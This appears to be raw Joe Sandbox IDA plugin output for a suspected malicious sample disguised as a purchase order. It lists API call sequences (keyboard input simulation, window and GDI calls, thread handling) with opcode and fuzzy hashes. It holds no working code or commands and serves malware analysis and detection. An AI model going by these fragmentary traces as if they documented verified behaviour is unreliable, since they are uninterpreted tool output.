                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _malloc_wcslen$_strcat_wcscpy
                                  • String ID:
                                  • API String ID: 1612042205-0
                                  • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                  • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                  • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                  • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove_strncmp
                                  • String ID: >$U$\
                                  • API String ID: 2666721431-237099441
                                  • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                  • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                  • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                  • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$InputSend
                                  • String ID:
                                  • API String ID: 2221674350-0
                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcscpy$_wcscat
                                  • String ID:
                                  • API String ID: 2037614760-0
                                  • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                  • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                  • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                  • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                  • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                  • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                  • String ID:
                                  • API String ID: 960795272-0
                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                  • EndPaint.USER32(?,?), ref: 00447D13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                  • String ID:
                                  • API String ID: 4189319755-0
                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                  APIs
                                  • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                  • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                  • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                  • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                  • 742845F0.USER32(?,000000F0,?,00001024,00000000,00000000,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490D4
                                  • 742859E0.USER32(?,000000F0,00000000,?,000000F0,?,00001024,00000000,00000000,?,0000111E,00000000,00000000,?,00000409,00000000), ref: 004490E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$742845742859InvalidateRect
                                  • String ID:
                                  • API String ID: 3483730924-0
                                  • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                  APIs
                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Window$Enable$Show$MessageSend
                                  • String ID:
                                  • API String ID: 1871949834-0
                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                  APIs
                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                  • 6FDA2980.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                  • 6FD9C400.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                  • SendMessageW.USER32 ref: 00471AE3
                                  • DestroyCursor.USER32(?), ref: 00471AF4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: MessageSend$A2980C400CursorDestroyExtractIcon
                                  • String ID:
                                  • API String ID: 2591440241-0
                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74285DeleteObject$CursorDestroyMoveWindow
                                  • String ID:
                                  • API String ID: 3700930721-0
                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcslen.LIBCMT ref: 004438CD
                                  • _wcslen.LIBCMT ref: 004438E6
                                  • _wcstok.LIBCMT ref: 004438F8
                                  • _wcslen.LIBCMT ref: 0044390C
                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                  • _wcstok.LIBCMT ref: 00443931
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                  • String ID:
                                  • API String ID: 3632110297-0
                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                  APIs
                                  Similarity
                                  • API ID: Destroy$DeleteMenuObject$74285Cursor
                                  • String ID:
                                  • API String ID: 3561812883-0
                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                  APIs
                                  Similarity
                                  • API ID: 74285DeleteObject$A0860CursorDestroy
                                  • String ID:
                                  • API String ID: 1806040871-0
                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                  APIs
                                  Similarity
                                  • API ID: 74285DeleteObject$A0860CursorDestroy
                                  • String ID:
                                  • API String ID: 1806040871-0
                                  • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                  • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                  • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                  • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                  APIs
                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                  APIs
                                  • SendMessageW.USER32 ref: 004555C7
                                  • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                  • DeleteObject.GDI32(?), ref: 00455736
                                  • DeleteObject.GDI32(?), ref: 00455744
                                  • DestroyCursor.USER32(?), ref: 00455752
                                  • 74285CF0.USER32(?), ref: 00455760
                                  Similarity
                                  • API ID: DeleteMessageObjectSend$74285CursorDestroy
                                  • String ID:
                                  • API String ID: 2906226244-0
                                  • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                  • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                  • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                  • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                  • EndPath.GDI32(?), ref: 004472D6
                                  • StrokePath.GDI32(?), ref: 004472E4
                                  Similarity
                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                  • String ID:
                                  • API String ID: 372113273-0
                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                  APIs
                                  • 7427A570.USER32(00000000), ref: 0044CC6D
                                  • 74284620.GDI32(00000000,00000058), ref: 0044CC78
                                  • 74284620.GDI32(00000000,0000005A), ref: 0044CC84
                                  • 7427A480.USER32(00000000,00000000), ref: 0044CC90
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                  Similarity
                                  • API ID: 742774284620$A480A570
                                  • String ID:
                                  • API String ID: 4022277249-0
                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                  APIs
                                  • __getptd.LIBCMT ref: 0041708E
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __amsg_exit.LIBCMT ref: 004170AE
                                  • __lock.LIBCMT ref: 004170BE
                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                  • _free.LIBCMT ref: 004170EE
                                  • InterlockedIncrement.KERNEL32(019E17F0), ref: 00417106
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                  • RtlEnterCriticalSection.KERNEL32(?), ref: 0044B666
                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                  APIs
                                    • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                  • RtlExitUserThread.KERNEL32(00000000), ref: 004151ED
                                  • __freefls@4.LIBCMT ref: 00415209
                                  Similarity
                                  • API ID: Value$ErrorExitLastThreadUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                  • String ID:
                                  • API String ID: 3590604804-0
                                  • Opcode ID: 9accb2c970c3ad42c36fa16d08c3c3a8e1e2ab1c4653ce7caab8e07ca954b280
                                  • Instruction ID: 33dbf055cdb8ff64cef25b7eefd28ade4c14083f8bd1581388e3e252127bbc8b
                                  • Opcode Fuzzy Hash: 9accb2c970c3ad42c36fa16d08c3c3a8e1e2ab1c4653ce7caab8e07ca954b280
                                  • Instruction Fuzzy Hash: B3F03675904705AFC704BFB2C9498CE7B75AF84349720845EB90847222DA3CD8C2CA59
                                  APIs
                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                  • RtlExitUserThread.KERNEL32(00000000), ref: 004151ED
                                  • __freefls@4.LIBCMT ref: 00415209
                                  Similarity
                                  • API ID: Value$ErrorExitLastThreadUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                  • String ID:
                                  • API String ID: 3516609193-0
                                  • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                  • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                  • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                  • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                  • _wcslen.LIBCMT ref: 0045F94A
                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                  Strings
                                  Similarity
                                  • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                  • String ID: 0
                                  • API String ID: 621800784-4108050209
                                  • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                  • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                  Strings
                                  Similarity
                                  • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                  • String ID: \VH
                                  • API String ID: 3884216118-234962358
                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
